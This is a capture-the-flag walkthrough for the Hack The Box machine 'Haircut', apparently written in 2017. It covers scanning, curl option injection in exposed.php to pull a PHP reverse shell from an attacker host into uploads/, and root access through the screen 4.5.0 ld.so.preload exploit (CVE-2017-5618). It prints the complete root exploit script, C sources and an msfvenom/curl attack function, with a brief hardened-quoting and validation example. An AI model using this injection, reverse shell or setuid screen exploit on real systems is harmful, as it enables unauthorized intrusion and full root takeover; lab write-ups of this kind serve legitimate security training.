Difficulty Rating:

Machine: Haircut
OS: Linux
IP: 10.10.10.24

  • Nmap scan for TCP
$ nmap -A -sV -Pn  10.10.10.24 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-31 10:44 IST
Nmap scan report for 10.10.10.24
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (EdDSA)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.42 seconds
  • Nmap scan for UDP
$ sudo nmap -A -sV -Pn -sU  10.10.10.24 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-31 10:54 IST
Nmap scan report for 10.10.10.24
Host is up (0.18s latency).
Not shown: 996 closed ports
PORT      STATE         SERVICE VERSION
17592/udp open|filtered unknown
19075/udp open|filtered unknown
19728/udp open|filtered unknown
31731/udp open|filtered unknown
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 39217/udp)
HOP RTT       ADDRESS
1   214.64 ms 10.10.14.1
2   217.71 ms 10.10.10.24

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1137.82 seconds
  • Nikto
nikto -h http://10.10.10.24
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.24
+ Target Hostname:    10.10.10.24
+ Target Port:        80
+ Start Time:         2017-07-31 11:16:20 (GMT5.5)
---------------------------------------------------------------------------
+ Server: nginx/1.10.0 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x59198410 0x90 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /test.html: This might be interesting...
+ 7499 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2017-07-31 11:42:33 (GMT5.5) (1573 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • Dirb
dirb http://10.10.10.24

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul 31 11:09:15 2017
URL_BASE: http://10.10.10.24/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.24/ ----
+ http://10.10.10.24/index.html (CODE:200|SIZE:144)
==> DIRECTORY: http://10.10.10.24/uploads/

---- Entering directory: http://10.10.10.24/uploads/ ----

-----------------
END_TIME: Mon Jul 31 11:40:44 2017
DOWNLOADED: 9224 - FOUND: 1
  • There’s another file available, named exposed.php.
  • Unfortunately, I didn’t find it by enumeration; I got it from a friend.
  • Visit http://10.10.10.24/exposed.php
  • It takes a URL from an input box and runs curl against it on the server. The value is put into the command unquoted, so extra curl options can be injected after the URL.
  • There’s a folder called /uploads available (found by dirb above), and the web server can write to it. Let’s have curl write our payload there.
  • In the input box, enter
http://10.10.15.16/payload.txt -o uploads/payload.php
  • Here 10.10.15.16 is the attacker machine, serving payload.txt (a PHP reverse shell); curl on the target fetches it and saves it as uploads/payload.php.
  • Start the listener first: open msfconsole, use exploit/multi/handler and set the payload, LHOST and LPORT to match payload.txt.
  • Execute the payload by visiting http://10.10.10.24/uploads/payload.php
  • Own user (the shell comes back as www-data).
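
The exposed.php step above, as an added example that is not part of the original writeup: it shows why an unquoted value lets -o through (word splitting turns one input into several curl arguments), what the hardened form looks like, the input check the page should have had, and the attack sequence as a function. The form-field name formurl, the msfvenom payload type and the listening port 4444 are assumptions not stated on the page.

```bash
#!/bin/bash
# Added example (not from the original writeup). Assumptions not stated on the
# page: the PHP behind exposed.php builds a command like  curl $url  (unquoted),
# the form field is called "formurl", and the handler listens on port 4444.

ATTACKER="10.10.15.16"   # attacker box serving payload.txt (from the writeup)
TARGET="10.10.10.24"     # Haircut

# The value typed into the input box: a real URL followed by injected curl options.
injection_value() {
    printf 'http://%s/payload.txt -o uploads/payload.php' "$ATTACKER"
}

# Emulate the vulnerable server: unquoted expansion splits the value into
# separate argv words, so curl sees "-o" and the output path as options.
vulnerable_argv_count() {
    # shellcheck disable=SC2086
    set -- curl $1
    echo "$#"
}

# Hardened: the value is passed as ONE argument after "--", so curl treats the
# whole string as the URL and nothing can be smuggled in as an option.
hardened_argv_count() {
    set -- curl -- "$1"
    echo "$#"
}

# Input validation the page should have done before touching curl at all:
# accept only http(s) URLs with no whitespace and no leading dash.
is_safe_curl_target() {
    case "$1" in
        -*)                 return 1 ;;   # would be parsed as an option
        *[[:space:]]*)      return 1 ;;   # word splitting smuggles extra args
        http://*|https://*) return 0 ;;
        *)                  return 1 ;;
    esac
}

# The full attack as the writeup does it (not run here: it needs the lab network
# and a handler already listening on $ATTACKER:4444).
run_attack() {
    # 1. PHP reverse shell, served from the attacker box on port 80
    msfvenom -p php/meterpreter/reverse_tcp LHOST="$ATTACKER" LPORT=4444 -f raw -o payload.txt
    python3 -m http.server 80 &
    # 2. Inject: curl on the target fetches payload.txt and writes it into uploads/
    curl -s "http://$TARGET/exposed.php" --data-urlencode "formurl=$(injection_value)"
    # 3. Trigger the uploaded PHP; the reverse shell connects back to the handler
    curl -s "http://$TARGET/uploads/payload.php"
}
```

The two argv counts are the whole story: with the unquoted form curl receives four words (curl, the URL, -o, the path); with the quoted form it receives three and the injected text is just part of a URL that curl will fail to fetch.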

  • To own root, check for SUID binaries:
$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 May  4 10:33 /bin/su
-rwsr-xr-x 1 root root 40152 Dec 16  2016 /bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16  2016 /bin/umount
-rwsr-xr-x 1 root root 136808 Jan 20  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 23376 Jan 18  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 May  4 10:33 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 39904 May  4 10:33 /usr/bin/newgrp
-rwsr-xr-x 1 root root 32944 May  4 10:33 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 May  4 10:33 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 May  4 10:33 /usr/bin/passwd
-rwsr-xr-x 1 root root 1588648 May 19 07:27 /usr/bin/screen-4.5.0
-rwsr-xr-x 1 root root 40432 May  4 10:33 /usr/bin/chsh
-rwsr-xr-x 1 root root 49584 May  4 10:33 /usr/bin/chfn
-rwsr-xr-x 1 root root 38984 Mar  7 21:18 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 208680 Apr 29 10:39 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 17:56 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Mar 16 15:04 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14864 Jan 18  2016 /usr/lib/policykit-1/polkit-agent-helper-1
  • screen 4.5.0 (the setuid /usr/bin/screen-4.5.0 above) is vulnerable: CVE-2017-5618. With -L, screen opens the logfile as root without dropping privileges or checking ownership, so it can create and append to /etc/ld.so.preload. A library listed there is loaded into the next setuid process (screen -ls) and its constructor runs as root.
  • Use the below exploit to gain root permissions

  • Exploit
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
/* constructor: runs as root when the setuid screen loads this library via /etc/ld.so.preload */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");   /* clean up so later binaries are not affected */
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
#include <unistd.h>
/* becomes setuid root once libhax.so has run */
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", (char *[]){"/bin/sh", NULL});
    return 1;
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Note: If the above exploit does not work out-of-the-box (for instance because the two C files cannot be compiled on the target), compile libhax.c and rootshell.c on your local machine and upload both resulting binaries, /tmp/libhax.so and /tmp/rootshell, to /tmp/ on the target. Then upload a script (rootshell.sh) containing the following to /var/www/html/uploads/ on the target:

#!/bin/bash
# rootshell.sh: the trigger half of screenroot.sh, for when libhax.so and
# rootshell were compiled elsewhere and already sit in /tmp/
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
  • Give it execute permissions and run it from the www-data shell:
./rootshell.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cat /root/root.txt
XXXXXXX
  • The “cannot be preloaded” warning is expected: the terminal output screen captured into the log file is not a library path, so ld.so skips that line, then loads /tmp/libhax.so from the next line; its constructor prints [+] done! and makes /tmp/rootshell setuid root.
User and Root owned!!

Share the fun!